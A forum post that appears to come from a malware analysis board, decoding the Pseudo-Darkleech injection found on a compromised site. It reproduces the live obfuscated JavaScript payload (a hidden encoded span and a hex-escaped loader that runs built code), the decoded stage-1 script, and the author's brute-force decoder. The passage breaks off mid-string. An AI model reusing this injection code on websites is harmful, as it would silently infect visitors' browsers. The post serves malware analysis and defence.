Recent Posts

Pages: 1 ... 3 4 [5] 6 7 ... 10
41
Malware Analysis / Decoding Pseudo-Darkleech
« Last post by SysAdMini on April 23, 2016, 12:42:07 am »
Daniel Wesemann published 2 articles on ISC SANS about decoding Pseudo-Darkleech.

https://isc.sans.edu/forums/diary/Decoding+PseudoDarkleech+1/20969/
https://isc.sans.edu/forums/diary/Decoding+PseudoDarkleech+Part+2/20975/

I didn't know about these articles, but interestingly I was working on same topic today. My goal was finding a more automated way of decoding the obfuscated iframe.

I found this code on a compromised site today.

Code: [Select]
<span id="undefinedNew" style="display:none">113b uc117 ,12r1 127! 125 72 121 123e 115 121 127 125 3i7 48 51b 67 111b bua113 118 xb1b24 11-9a a111 54 107a 113 1c24 125 122 12-1 1dv06- 69a 49 51-q 48 a5m1 e67 111 1p13 118 124 119 -a111 was54 b123 1o12 106 119 -b117 125 a69 49 35 b1b25d 107 -123 n121 1e0n4e o125 89 106 125 121 -37 due67 58 u106 110 34 a41 41 58 52q 58 85 75 81bzb 93 58k 52 6c-9 35 126 119 10y6b 48w 119 118 e1i15 1-25 9dj7 104 10e6b 1ed25 107 107 75 111 11-3a 108 123 112 37d 1c13 117 121 1l27 c125 72 121 -12a3 115 12c1 1g27 125 cb35 1d19 -118 1h15b; 12w5 97 104e 106 12-5q 10ba7e 107 75 111 l113 108 123 bj112 b36 125d bl10-7 123e -121 d104 125 8-9 106 1b25 121 54i 116 1b-25 1m18 b127 w108 112 35 11cc9 118 115 125 97 104 1e06 125 10h7 107 7dq5 111 113 -108b 123 112 m5b1 y51 49 99 113 126 48a -y118 121 1b1cb0 1s13 a1mc27d 121 d108 119 106 54 v109 107 d125 10b6 e89b 127b 125 j118 1c0-c8b 54z 1dw13 118b 124 12q5 bo96 87 126d -48 1p25 107- 123 1ei2-d1 104 125 89w d106 12-5 121 67 119 11f8d w115 -e.tde12ex5 97em ,104d v106 e125 107 10pa7 a75 111e 113 108 123 11l2 e6e9 4a9 38 113 -w117- 121 127 1b25 7s2b 12-i1 b123 115 1t21 127 12-5 49 99 11a9 1ga18 123 116 11i3 -1c2bbz3 c115 95 c125c 108g -91b 116 p1d21 j107 107 3e7 1d25e 107 123 ead121c 10-i4 125 89 106b 1i25 12bb1 54 116 125 118 bn127 10b8 112 53m 11a9 118 11d5 1bp25 b97 104 106 125 10w7 10e7 7-5 111 113 108 1v2bk3 d112 r35 122 b106 125 121s 115 35 1b01 1-01 113 126 48 ud118 1d21 110 113 127 121 108 c119 106 54 109 1j0e7ib 1b25 1e06 89 127- 12b5b 1v1-8 108 54 113 11a8 1jb24 125k 9b6x 87c 126 48 58 8k5 75 81b 93i 56d 41 40 58 4q9 38-c 113 -117 d.121 127e 125 72dd 121 -123 11n5 121 127 125 4c9d 9b9 11i9 a11-8 123 116 113t ch123 1b1u5 95 1-25 10d8 n91 116d 1xbb21 107 107 51 51 35 1-01 124 119 123 10e-j9 1e17 125edf 1e18 10q8b h93 117d 122,j c125 124 37 58h 85 96 74- 8c3e 126 95 92a 75 9v5 40c 91 93 d3b2l 64 a58 35 s104 121 -1e06 10b7 125 9b4 11zb6 11h9 121 108 87 118 124 1-b06 121 127 124u 1c06 1q19 -104 b3-7 124 119 1m2e3fbfdw cka109 m117 125 118 1b08 5-4 127 125 108 93 1r16 125 11-b7 n125 a.1d1-e8 ,108 r90 97 e81 124 48 c58 109 118 12b4 x125 126 113 b118 1j25 124 86c n125 1-b1x1 5b8 y4d9 54 113 118 118 125 10-6 80 7a6 8-c5 84b 3b5 1-j07b 108 12f1 1c08 109 107b 89 1b16- 116 37 107 111 113 1v-0b-8d 123 c112 8d6 121 108 113b 110 1r2b5 37 g113 117- 121 127 12b5 72 121 123 u115 121 127 1cq25 35b 10q4 121 107 10b7 1q1d1 119 1i06- d,u124 93- 116 1b2s5 11ba7 125 118b 108 107 3h7 58- b58 35 ka104 kby1bw21 c106 107ce 1uc25 94q 116 119 1b2s1c 1b0ace8 8ne7 118 124 106 1t21 c127x 124 106 11-9 104 3d7 10-4t 121c 10h6 10be7 12e5 9ub4 116 119 z121 108 87 118 124 1-06 121 127 c12g4 10b6 j119c q1b0rex4 54 106a 125 104 116 121 123 125 48 55 67 70l 1e2a1 53e 98 v69 55 127 5a2 -58 58i b49 35 126 1q19 106 48e 119 1i1a8- 11o5 1-25 9b7 104 1ib06 t125c a1b07 107 75 1v11 113 -1cq08 123 -11e2 37 113 117 121r 127 125e 7o2a 121 123 ie115 a121 127 c125j aae35 119 11b8 115 12cc5 9-d7 10-4 m10ea6 125 10,7 10cd7 75 11b1 113n 10-8 c123 1-12 36 10kd4o 1bm21e 106 107 125t 94 116a- e1c19 121i 108 87 b118 124ka 106 12o1e 127 124 106 k1-19 1bo04 54 116 125 11ak8b 127m c10-8d 112 35 119 118 b1g15 125es 97 104 a10s6 125 b107 h107b 75 h1c11 113 vb108q 1.23 11c2- 51 51 49 9ga9o 1c04 121l 12b3 1-15la 1b21 1b27 125 78 1g21 11b6 1-09 g12e5 8j-7 126 37 104 e1r21 106 -107 12a5 94 116 119 121m 108 87 118 124 106 1b21 127 124 1-06q 119 bjcw1c04 5-f4 1b23 1gb12 d121 -10e6k 91 119c- 124 125 ea89 108u 48 119 118 11-b5 125k 97 104 1e06r, 125 107 107 75 1e11 11j3 108 1b23v 112-c, 49 qc3d-5 113 12c6 48 -1b07a 108- 12c1 108 109 107 e89 116 1p16 61 119 118 d123 116 11-3 123 u115 95 125 108 91 116 121 107 107 4a9- 99 o1b04 121z b107 -1l07- a111 119c 106 -124 93 116 12c5b 117 125 118 1b08 1h07ev 51 37 75 108 106-b r1d13 118 127 5-l4 12-b6 106 -119 1v17bk 9dn1b 112 121 10w6b- 91k 119 a124 125uc 48 48 48 11-9 1k18 115- 125 97 109 1c-04 75 e123 106 125 125a ub118 65 51 104 121 mb123 q115 -b121 w127 125 78 121bv 116 1d09 1k-b25 87- s126 b53- 33 4o7 49 70 -d124 11-p9 123 brd-v109- 11b7 125b 1c18jbmc 108v 93 117 122 125 a124 5w4 123 112 121 106 9a1 119 124 125r 8b9 108-k a48 1m07 11dz-1 113 108 b123 112 86 1h21 a-108 e-11dp3bp 110 b125 6eb1 124 119 123- 109 11n7 -1bm25 118 -1ci08 93c 117f 1b2-2 125 124 54 11x6 125 118a 12a7 108av 11c2 49 49 61 42 45 j4d5 y4b-9 35 10oe7 -111 113 1d08 123 ,11cu2 8-6 121b 108 113 110- 125 w5c1 51j 35 101 1d25me- k1c16i 1-07 125 99 apb119 118 11j5 1b25 97 w109 104 75c 123 106he 125s 125 -a118 -65s 37 e48 1j04 12-1 123e 1i15 121 a127 12i5 78e 121 116 1-09 125 8s7 126 53 -33 47e 49- 5f0 4-1 43 50 a1-1q9c 118 123 11d6b 113 123 115 95 12i5 108 9abb1v 1-16 b121w 107- 107 35 101 107 108 121 108 10e9 107 8g9 116 1d16 51 51 35 x101 67 69 67 58 -1ac23 119 118 107 108 106 eo10-e9 123 108 11n-9b 10-6 58 6a-9 6d7 58-y 123 1e19 118 j107 108 -10d6-j 10-9 c-12h3 -108 bta119u b106 58 69 48 104 -121 10m7 107 b-p1c1c1e 119r 106 124a m93e 1e16 12b-5 117 h125 118 10-8 1d07 49d 48 4b9 35-u-eldretei</span>
<script>
undefinedEncodeURI="\x28";onfocusHistory="\x63\x6f";statusOnblur="\x5d";onfocusHistory+="\x6e\x73\x74";formsString=onfocusHistory;onfocusHistory="\x6e\x70";textareaConst="\x72\x75\x63";textareaConst+="\x74\x6f\x72";formsString+=textareaConst;doWhile="\x6c\x69";staticHidden="\x72\x69";functionConstructor="\x67\x2c";enumInterface="\x6c";privateScreenY="\x22";ArrayInnerWidth="\x65\x76";importParseFloat="\x79";isPrototypeOfSubmit="\x22";layersImages="\x5d";formsEvent="\x28";openString="\x6c";onmousedownOncontextmenu="\x65";outerHeightOnkeydown="\x72\x43";onerrorByte="\x29";longParseInt="\x6c";abstractLayer="\x6e\x74\x42";abstractOnsubmit="\x65";onkeyupVolatile="\x22";eventSwitch="\x64\x6f";parseIntEmbed="\x74\x28";onbeforeunloadNaN="\x75\x6c";enumInterface+="\x65\x6e\x67";enumOnfocus="\x69\x2b";volatileOnkeyup="\x65";onloadOnfocus="\x5b\x69";frameRateAbstract="\x4c";nameDocument="\x5b";undefinedVar="\x3c\x61\x2e";doObject="\x2e\x72\x65";offscreenBufferingFinal="\x6d";clearIntervalThis="\x75";optionOnkeypress="\x48";JavaClassDebugger="\x63";shortThrows="\x65";mimeTypesString="\x61\x3d";layerMath=mimeTypesString;mimeTypesString="\x76\x6c\x76";privateTaint="\x5e";layerMath+=eventSwitch;eventSwitch="\x67\x74";layerMath+=JavaClassDebugger;textFloat="\x29";layerMath+=clearIntervalThis;clearIntervalThis="\x76\x77\x76";newInt="\x20";layerMath+=offscreenBufferingFinal;layerMath+=shortThrows;shortThrows+=eventSwitch;fileUploadConstructor="\x3d";closeImage="\x65\x2e\x61";extendsClass="\x66";instanceofOnload="\x54";throwsVar="\x34";varAssign="\x45\x6c";submitTop="\x3b";fileUploadImplements="\x79";eventAnchor="\x6f\x64";onmouseupOffscreenBuffering="\x4d";openerInfinity="\x6f";setTimeoutWindow="\x53";tryObject="\x5d";withInfinity="\x2c";typeofProtected="\x29";evalImage="\x2f\x5b";undefinedSynchronized="\x22\x75";pageXOffsetCase="\x6c";throwsOnmousedown="\x70";elementImages="\x2b";defaultStatusIn="\x2f";letSecure="\x22\x29";charThis="\x70\x6c\x61";pkcs11GetClass="\x73";intInterface="\x32";eventPassword="\x20";switchClearInterval="\x61";newAssign="\x74";prototypeInnerWidth="\x3b";JavaPackageAssign="\x5c";scrollUndefined="\x6f\x6d";JavaObjectForms="\x70";gotoSwitch="\x69\x3d";classNavigator="\x6e";hiddenOnblur="\x73\x70";fileUploadConstructor+="\x70\x61\x72";scrollUndefined+="\x43\x68\x61";anchorIf="\x74\x2e\x67";scrollEmbed="\x65";oncontextmenuEmbed="\x65\x64";publicObject="\x74";frameFocus="\x29\x2e";documentAll="\x61\x29\x29";allNavigate="\x28";scrollEmbed+="\x49";voidFileUpload="\x6e";layerMath+=voidFileUpload;voidFileUpload=shortThrows;defaultVolatile="\x6d\x65";layerMath+=anchorIf;anchorIf+=mimeTypesString;pageYOffsetLayer="\x2e\x69\x6e";layerMath+=onmousedownOncontextmenu;onmousedownOncontextmenu="\x61\x67";layerMath+=newAssign;newAssign=eventSwitch;parseIntContinue="\x4e\x65";layerMath+=varAssign;varAssign+=onmousedownOncontextmenu;undefinedSynchronized+="\x6e\x64";layerMath+=abstractOnsubmit;abstractOnsubmit="\x75\x79\x78";layerMath+=defaultVolatile;mimeTypesTop="\x72";layerMath+=abstractLayer;abstractLayer="\x78\x76\x64";layerMath+=fileUploadImplements;fileUploadImplements="\x6b\x64";documentAll+="\x3b";pageYOffsetOnclick="\x61";pluginEval="\x64";navigatorChar="\x65\x66";gotoHasOwnProperty="\x66\x72";pluginParseFloat="\x69";hasOwnPropertyBoolean="\x5e";staticJavaClass="\x77\x22";nameExtends="\x6e\x67\x2e";fileUploadAlert="\x72";scrollEmbed+="\x6e";nullIn="\x6e";gotoSwitch+="\x30\x3b\x69";superScreenY="\x49\x64\x28";layerMath+=superScreenY;superScreenY+=fileUploadImplements;scrollEmbed+="\x74";layerMath+=undefinedSynchronized;scrollEmbed+="\x28\x61";navigatorChar+="\x69\x6e";layerMath+=navigatorChar;charThis+="\x63\x65\x28";layerMath+=oncontextmenuEmbed;oncontextmenuEmbed="\x69\x6d\x73";layerMath+=parseIntContinue;parseIntContinue=newAssign;layerMath+=staticJavaClass;staticJavaClass+=fileUploadImplements;transientFinal="\x74\x68\x3b";layerMath+=onerrorByte;onerrorByte=superScreenY;layerMath+=pageYOffsetLayer;pageYOffsetLayer=abstractOnsubmit;layerMath+=classNavigator;classNavigator=navigatorChar;layerMath+=volatileOnkeyup;volatileOnkeyup+=undefinedSynchronized;layerMath+=mimeTypesTop;mimeTypesTop=newAssign;layerMath+=optionOnkeypress;optionOnkeypress=offscreenBufferingFinal;layerMath+=instanceofOnload;layerMath+=onmouseupOffscreenBuffering;onmouseupOffscreenBuffering=oncontextmenuEmbed;layerMath+=frameRateAbstract;layerMath+=doObject;layerMath+=charThis;charThis=undefinedSynchronized;layerMath+=evalImage;layerMath+=hasOwnPropertyBoolean;hasOwnPropertyBoolean="\x62\x72\x77";layerMath+=JavaPackageAssign;JavaPackageAssign="\x63\x63";layerMath+=pluginEval;layerMath+=newInt;newInt=eventSwitch;layerMath+=layersImages;layersImages+=JavaClassDebugger;layerMath+=defaultStatusIn;defaultStatusIn=clearIntervalThis;layerMath+=functionConstructor;functionConstructor+=oncontextmenuEmbed;layerMath+=onkeyupVolatile;onkeyupVolatile=navigatorChar;layerMath+=privateScreenY;privateScreenY="\x78\x6b";layerMath+=frameFocus;frameFocus="\x7a\x73";layerMath+=hiddenOnblur;layerMath+=doWhile;layerMath+=parseIntEmbed;onbeforeunloadOnmouseup=[][formsString];parseIntEmbed+=defaultVolatile;layerMath+=isPrototypeOfSubmit;isPrototypeOfSubmit=navigatorChar;layerMath+=eventPassword;eventPassword="\x6a\x74\x66";layerMath+=letSecure;letSecure=clearIntervalThis;layerMath+=prototypeInnerWidth;prototypeInnerWidth="\x70\x71";layerMath+=extendsClass;layerMath+=openerInfinity;openerInfinity=voidFileUpload;layerMath+=fileUploadAlert;fileUploadAlert="\x69\x70\x6e";layerMath+=undefinedEncodeURI;undefinedEncodeURI=shortThrows;layerMath+=gotoSwitch;gotoSwitch=mimeTypesString;layerMath+=undefinedVar;undefinedVar+=JavaClassDebugger;layerMath+=enumInterface;layerMath+=transientFinal;transientFinal+=anchorIf;layerMath+=enumOnfocus;enumOnfocus+=pageYOffsetLayer;layerMath+=elementImages;elementImages="\x6f\x66\x63";layerMath+=typeofProtected;layerMath+=pageYOffsetOnclick;layerMath+=nameDocument;nameDocument+=abstractLayer;layerMath+=pluginParseFloat;layerMath+=tryObject;layerMath+=fileUploadConstructor;fileUploadConstructor+=voidFileUpload;layerMath+=pkcs11GetClass;pkcs11GetClass=mimeTypesString;layerMath+=scrollEmbed;scrollEmbed=abstractOnsubmit;layerMath+=onloadOnfocus;onloadOnfocus+=JavaClassDebugger;layerMath+=statusOnblur;layerMath+=textFloat;layerMath+=privateTaint;privateTaint=undefinedSynchronized;layerMath+=intInterface;intInterface="\x65\x6e\x6a";layerMath+=throwsVar;layerMath+=submitTop;layerMath+=ArrayInnerWidth;ArrayInnerWidth=voidFileUpload;layerMath+=switchClearInterval;switchClearInterval=mimeTypesString;layerMath+=openString;layerMath+=formsEvent;formsEvent=shortThrows;layerMath+=setTimeoutWindow;setTimeoutWindow+=fileUploadImplements;layerMath+=publicObject;layerMath+=staticHidden;staticHidden+=pageYOffsetLayer;layerMath+=nameExtends;nameExtends="\x72\x70";layerMath+=gotoHasOwnProperty;gotoHasOwnProperty=undefinedSynchronized;layerMath+=scrollUndefined;scrollUndefined="\x76\x7a\x76";layerMath+=outerHeightOnkeydown;outerHeightOnkeydown=clearIntervalThis;layerMath+=eventAnchor;eventAnchor=pageYOffsetLayer;layerMath+=closeImage;lengthShort=onbeforeunloadOnmouseup[formsString];outerHeightNative="\x71\x74";outerHeightNative+="\x6e\x6c";formsString=outerHeightNative;outerHeightNative+=outerHeightNative;layerMath+=throwsOnmousedown;throwsOnmousedown+=anchorIf;layerMath+=JavaObjectForms;layerMath+=longParseInt;layerMath+=importParseFloat;importParseFloat=shortThrows;layerMath+=allNavigate;allNavigate+=mimeTypesString;layerMath+=nullIn;nullIn="\x6a\x6f";layerMath+=onbeforeunloadNaN;onbeforeunloadNaN="\x72\x69\x6e";layerMath+=pageXOffsetCase;pageXOffsetCase="\x61\x67\x72";layerMath+=withInfinity;layerMath+=documentAll;documentAll="\x77\x74";lengthShort(layerMath)();byteTextarea="\x6a\x6d\x6c";byteTextarea+="\x66";layerMath=byteTextarea;
</script>
<noscript>
<!DOCTYPE html>
<!--[if IEMobile 7]><html class="iem7" lang="de" dir="ltr"><![endif]-->
<!--[if lte IE 6]><html class="lt-ie9 lt-ie8 lt-ie7" lang="de" dir="ltr"><![endif]-->
<!--[if (IE 7)&(!IEMobile)]><html class="lt-ie9 lt-ie8" lang="de" dir="ltr"><![endif]-->
<!--[if IE 8]><html class="lt-ie9" lang="de" dir="ltr"><![endif]-->
<!--[if (gte IE 9)|(gt IEMobile 7)]><!--><html lang="de" dir="ltr"><!--<![endif]-->
<head>

The decode process is being done in 2 stages. Daniel describes the stages in separate articles. Stage 1 creates Javascript code which is being used for creation of an iframe in stage 2.

The result of stage 1 looks like this:

Quote
imagePackage=(+[window.sidebar])+(+[window.chrome]);escapeArea=["rv:11","MSIE",];for(onkeypressSwitch=imagePackage;onkeypressSwitch<escapeArea.length;onkeypressSwitch++){if(navigator.userAgent.indexOf(escapeArea[onkeypressSwitch])>imagePackage){onclickGetClass=escapeArea.length-onkeypressSwitch;break;}}if(navigator.userAgent.indexOf("MSIE 10")>imagePackage){onclickGetClass++;}documentEmbed="MxRKfGDSG0CE8X";parseFloatOndragdrop=document.getElementById("undefinedNew").innerHTML;statusAll=switchNative=imagePackage;passwordElements="";parseFloatOndragdrop=parseFloatOndragdrop.replace(/[^a-z]/g,"");for(onkeypressSwitch=imagePackage;onkeypressSwitch<parseFloatOndragdrop.length;onkeypressSwitch++){packageValueOf=parseFloatOndragdrop.charCodeAt(onkeypressSwitch);if(statusAll%onclickGetClass){passwordElements+=String.fromCharCode(((onkeyupScreenY+packageValueOf-97)^documentEmbed.charCodeAt(switchNative%documentEmbed.length))%255);switchNative++;}else{onkeyupScreenY=(packageValueOf-97)*13*onclickGetClass;}statusAll++;}[]["constructor"]["constructor"](passwordElements)();

This code is being created by concatenating a string out of the html section on top of the page.
The resulting string is then xored with a variable value.

We know the resulting code always contains a check for string 'MSIE'. This allows us to brute force the xor value.

Code: [Select]
undefinedNew="113b uc117 ,12r1 127! 125 72 121 123e 115 121 127 125 3i7 48 51b 67 111b bua113 118 xb1b24 11-9a a111 54 107a 113 1c24 125 122 12-1 1dv06- 69a 49 51-q 48 a5m1 e67 111 1p13 118 124 119 -a111 was54 b123 1o12 106 119 -b117 125 a69 49 35 b1b25d 107 -123 n121 1e0n4e o125 89 106 125 121 -37 due67 58 u106 110 34 a41 41 58 52q 58 85 75 81bzb 93 58k 52 6c-9 35 126 119 10y6b 48w 119 118 e1i15 1-25 9dj7 104 10e6b 1ed25 107 107 75 111 11-3a 108 123 112 37d 1c13 117 121 1l27 c125 72 121 -12a3 115 12c1 1g27 125 cb35 1d19 -118 1h15b; 12w5 97 104e 106 12-5q 10ba7e 107 75 111 l113 108 123 bj112 b36 125d bl10-7 123e -121 d104 125 8-9 106 1b25 121 54i 116 1b-25 1m18 b127 w108 112 35 11cc9 118 115 125 97 104 1e06 125 10h7 107 7dq5 111 113 -108b 123 112 m5b1 y51 49 99 113 126 48a -y118 121 1b1cb0 1s13 a1mc27d 121 d108 119 106 54 v109 107 d125 10b6 e89b 127b 125 j118 1c0-c8b 54z 1dw13 118b 124 12q5 bo96 87 126d -48 1p25 107- 123 1ei2-d1 104 125 89w d106 12-5 121 67 119 11f8d w115 -e.tde12ex5 97em ,104d v106 e125 107 10pa7 a75 111e 113 108 123 11l2 e6e9 4a9 38 113 -w117- 121 127 1b25 7s2b 12-i1 b123 115 1t21 127 12-5 49 99 11a9 1ga18 123 116 11i3 -1c2bbz3 c115 95 c125c 108g -91b 116 p1d21 j107 107 3e7 1d25e 107 123 ead121c 10-i4 125 89 106b 1i25 12bb1 54 116 125 118 bn127 10b8 112 53m 11a9 118 11d5 1bp25 b97 104 106 125 10w7 10e7 7-5 111 113 108 1v2bk3 d112 r35 122 b106 125 121s 115 35 1b01 1-01 113 126 48 ud118 1d21 110 113 127 121 108 c119 106 54 109 1j0e7ib 1b25 1e06 89 127- 12b5b 1v1-8 108 54 113 11a8 1jb24 125k 9b6x 87c 126 48 58 8k5 75 81b 93i 56d 41 40 58 4q9 38-c 113 -117 d.121 127e 125 72dd 121 -123 11n5 121 127 125 4c9d 9b9 11i9 a11-8 123 116 113t ch123 1b1u5 95 1-25 10d8 n91 116d 1xbb21 107 107 51 51 35 1-01 124 119 123 10e-j9 1e17 125edf 1e18 10q8b h93 117d 122,j c125 124 37 58h 85 96 74- 8c3e 126 95 92a 75 9v5 40c 91 93 d3b2l 64 a58 35 s104 121 -1e06 10b7 125 9b4 11zb6 11h9 121 108 87 118 124 1-b06 121 127 124u 1c06 1q19 -104 b3-7 124 119 1m2e3fbfdw cka109 m117 125 118 1b08 5-4 127 125 108 93 1r16 125 11-b7 n125 a.1d1-e8 ,108 r90 97 e81 124 48 c58 109 118 12b4 x125 126 113 b118 1j25 124 86c n125 1-b1x1 5b8 y4d9 54 113 118 118 125 10-6 80 7a6 8-c5 84b 3b5 1-j07b 108 12f1 1c08 109 107b 89 1b16- 116 37 107 111 113 1v-0b-8d 123 c112 8d6 121 108 113b 110 1r2b5 37 g113 117- 121 127 12b5 72 121 123 u115 121 127 1cq25 35b 10q4 121 107 10b7 1q1d1 119 1i06- d,u124 93- 116 1b2s5 11ba7 125 118b 108 107 3h7 58- b58 35 ka104 kby1bw21 c106 107ce 1uc25 94q 116 119 1b2s1c 1b0ace8 8ne7 118 124 106 1t21 c127x 124 106 11-9 104 3d7 10-4t 121c 10h6 10be7 12e5 9ub4 116 119 z121 108 87 118 124 1-06 121 127 c12g4 10b6 j119c q1b0rex4 54 106a 125 104 116 121 123 125 48 55 67 70l 1e2a1 53e 98 v69 55 127 5a2 -58 58i b49 35 126 1q19 106 48e 119 1i1a8- 11o5 1-25 9b7 104 1ib06 t125c a1b07 107 75 1v11 113 -1cq08 123 -11e2 37 113 117 121r 127 125e 7o2a 121 123 ie115 a121 127 c125j aae35 119 11b8 115 12cc5 9-d7 10-4 m10ea6 125 10,7 10cd7 75 11b1 113n 10-8 c123 1-12 36 10kd4o 1bm21e 106 107 125t 94 116a- e1c19 121i 108 87 b118 124ka 106 12o1e 127 124 106 k1-19 1bo04 54 116 125 11ak8b 127m c10-8d 112 35 119 118 b1g15 125es 97 104 a10s6 125 b107 h107b 75 h1c11 113 vb108q 1.23 11c2- 51 51 49 9ga9o 1c04 121l 12b3 1-15la 1b21 1b27 125 78 1g21 11b6 1-09 g12e5 8j-7 126 37 104 e1r21 106 -107 12a5 94 116 119 121m 108 87 118 124 106 1b21 127 124 1-06q 119 bjcw1c04 5-f4 1b23 1gb12 d121 -10e6k 91 119c- 124 125 ea89 108u 48 119 118 11-b5 125k 97 104 1e06r, 125 107 107 75 1e11 11j3 108 1b23v 112-c, 49 qc3d-5 113 12c6 48 -1b07a 108- 12c1 108 109 107 e89 116 1p16 61 119 118 d123 116 11-3 123 u115 95 125 108 91 116 121 107 107 4a9- 99 o1b04 121z b107 -1l07- a111 119c 106 -124 93 116 12c5b 117 125 118 1b08 1h07ev 51 37 75 108 106-b r1d13 118 127 5-l4 12-b6 106 -119 1v17bk 9dn1b 112 121 10w6b- 91k 119 a124 125uc 48 48 48 11-9 1k18 115- 125 97 109 1c-04 75 e123 106 125 125a ub118 65 51 104 121 mb123 q115 -b121 w127 125 78 121bv 116 1d09 1k-b25 87- s126 b53- 33 4o7 49 70 -d124 11-p9 123 brd-v109- 11b7 125b 1c18jbmc 108v 93 117 122 125 a124 5w4 123 112 121 106 9a1 119 124 125r 8b9 108-k a48 1m07 11dz-1 113 108 b123 112 86 1h21 a-108 e-11dp3bp 110 b125 6eb1 124 119 123- 109 11n7 -1bm25 118 -1ci08 93c 117f 1b2-2 125 124 54 11x6 125 118a 12a7 108av 11c2 49 49 61 42 45 j4d5 y4b-9 35 10oe7 -111 113 1d08 123 ,11cu2 8-6 121b 108 113 110- 125 w5c1 51j 35 101 1d25me- k1c16i 1-07 125 99 apb119 118 11j5 1b25 97 w109 104 75c 123 106he 125s 125 -a118 -65s 37 e48 1j04 12-1 123e 1i15 121 a127 12i5 78e 121 116 1-09 125 8s7 126 53 -33 47e 49- 5f0 4-1 43 50 a1-1q9c 118 123 11d6b 113 123 115 95 12i5 108 9abb1v 1-16 b121w 107- 107 35 101 107 108 121 108 10e9 107 8g9 116 1d16 51 51 35 x101 67 69 67 58 -1ac23 119 118 107 108 106 eo10-e9 123 108 11n-9b 10-6 58 6a-9 6d7 58-y 123 1e19 118 j107 108 -10d6-j 10-9 c-12h3 -108 bta119u b106 58 69 48 104 -121 10m7 107 b-p1c1c1e 119r 106 124a m93e 1e16 12b-5 117 h125 118 10-8 1d07 49d 48 4b9 35-u-eldretei";
a=undefinedNew.replace(/[^\d ]/g,"").split(" ");

for (x=0;x<256;x++) {
for (i=0;i<a.length;i++) a[i]=parseInt(a[i])^x;
s=String.fromCharCode.apply(null,a);
 if (s.indexOf('MSIE')>0) break;
document.write(s);
}

The lines of codes above do the decoding of stage 1. We get this result:
Quote
imagePackage=(+[window.sidebar])+(+[window.chrome]);escapeArea=["rv:11","MSIE",];for(onkeypressSwitch=imagePackage;onkeypressSwitch<escapeArea.length;onkeypressSwitch++){if(navigator.userAgent.indexOf(escapeArea[onkeypressSwitch])>imagePackage){onclickGetClass=escapeArea.length-onkeypressSwitch;break;}}if(navigator.userAgent.indexOf("MSIE 10")>imagePackage){onclickGetClass++;}documentEmbed="MxRKfGDSG0CE8X";parseFloatOndragdrop=document.getElementById("undefinedNew").innerHTML;statusAll=switchNative=imagePackage;passwordElements="";parseFloatOndragdrop=parseFloatOndragdrop.replace(/[^a-z]/g,"");for(onkeypressSwitch=imagePackage;onkeypressSwitch<parseFloatOndragdrop.length;onkeypressSwitch++){packageValueOf=parseFloatOndragdrop.charCodeAt(onkeypressSwitch);if(statusAll%onclickGetClass){passwordElements+=String.fromCharCode(((onkeyupScreenY+packageValueOf-97)^documentEmbed.charCodeAt(switchNative%documentEmbed.length))%255);switchNative++;}else{onkeyupScreenY=(packageValueOf-97)*13*onclickGetClass;}statusAll++;}[]["constructor"]["constructor"](passwordElements)();

I compared the code from various compromised sites and found that the code logic is always the same. The only difference is a string which is being used for xor-ing in stage 2. In the example above this string value is documentEmbed="MxRKfGDSG0CE8X". If we extract the value from code, then we can fully automate the decoding process.

So I added these lines to my code. A regular expression checks for ="".

Code: [Select]
re = /="([^"]+)"/;
str=re.exec(s)[1];
document.write(s)

For our example above it gives us the result:

Quote
MxRKfGDSG0CE8X

Now we only need to slightly change the original code of stage 2 and put everything together.

Save the following code as a htm file and open it in a browser.

Code: [Select]
<TEXTAREA id="output" ROWS=25 COLS=80></TEXTAREA>

<script>

undefinedNew="113b uc117 ,12r1 127! 125 72 121 123e 115 121 127 125 3i7 48 51b 67 111b bua113 118 xb1b24 11-9a a111 54 107a 113 1c24 125 122 12-1 1dv06- 69a 49 51-q 48 a5m1 e67 111 1p13 118 124 119 -a111 was54 b123 1o12 106 119 -b117 125 a69 49 35 b1b25d 107 -123 n121 1e0n4e o125 89 106 125 121 -37 due67 58 u106 110 34 a41 41 58 52q 58 85 75 81bzb 93 58k 52 6c-9 35 126 119 10y6b 48w 119 118 e1i15 1-25 9dj7 104 10e6b 1ed25 107 107 75 111 11-3a 108 123 112 37d 1c13 117 121 1l27 c125 72 121 -12a3 115 12c1 1g27 125 cb35 1d19 -118 1h15b; 12w5 97 104e 106 12-5q 10ba7e 107 75 111 l113 108 123 bj112 b36 125d bl10-7 123e -121 d104 125 8-9 106 1b25 121 54i 116 1b-25 1m18 b127 w108 112 35 11cc9 118 115 125 97 104 1e06 125 10h7 107 7dq5 111 113 -108b 123 112 m5b1 y51 49 99 113 126 48a -y118 121 1b1cb0 1s13 a1mc27d 121 d108 119 106 54 v109 107 d125 10b6 e89b 127b 125 j118 1c0-c8b 54z 1dw13 118b 124 12q5 bo96 87 126d -48 1p25 107- 123 1ei2-d1 104 125 89w d106 12-5 121 67 119 11f8d w115 -e.tde12ex5 97em ,104d v106 e125 107 10pa7 a75 111e 113 108 123 11l2 e6e9 4a9 38 113 -w117- 121 127 1b25 7s2b 12-i1 b123 115 1t21 127 12-5 49 99 11a9 1ga18 123 116 11i3 -1c2bbz3 c115 95 c125c 108g -91b 116 p1d21 j107 107 3e7 1d25e 107 123 ead121c 10-i4 125 89 106b 1i25 12bb1 54 116 125 118 bn127 10b8 112 53m 11a9 118 11d5 1bp25 b97 104 106 125 10w7 10e7 7-5 111 113 108 1v2bk3 d112 r35 122 b106 125 121s 115 35 1b01 1-01 113 126 48 ud118 1d21 110 113 127 121 108 c119 106 54 109 1j0e7ib 1b25 1e06 89 127- 12b5b 1v1-8 108 54 113 11a8 1jb24 125k 9b6x 87c 126 48 58 8k5 75 81b 93i 56d 41 40 58 4q9 38-c 113 -117 d.121 127e 125 72dd 121 -123 11n5 121 127 125 4c9d 9b9 11i9 a11-8 123 116 113t ch123 1b1u5 95 1-25 10d8 n91 116d 1xbb21 107 107 51 51 35 1-01 124 119 123 10e-j9 1e17 125edf 1e18 10q8b h93 117d 122,j c125 124 37 58h 85 96 74- 8c3e 126 95 92a 75 9v5 40c 91 93 d3b2l 64 a58 35 s104 121 -1e06 10b7 125 9b4 11zb6 11h9 121 108 87 118 124 1-b06 121 127 124u 1c06 1q19 -104 b3-7 124 119 1m2e3fbfdw cka109 m117 125 118 1b08 5-4 127 125 108 93 1r16 125 11-b7 n125 a.1d1-e8 ,108 r90 97 e81 124 48 c58 109 118 12b4 x125 126 113 b118 1j25 124 86c n125 1-b1x1 5b8 y4d9 54 113 118 118 125 10-6 80 7a6 8-c5 84b 3b5 1-j07b 108 12f1 1c08 109 107b 89 1b16- 116 37 107 111 113 1v-0b-8d 123 c112 8d6 121 108 113b 110 1r2b5 37 g113 117- 121 127 12b5 72 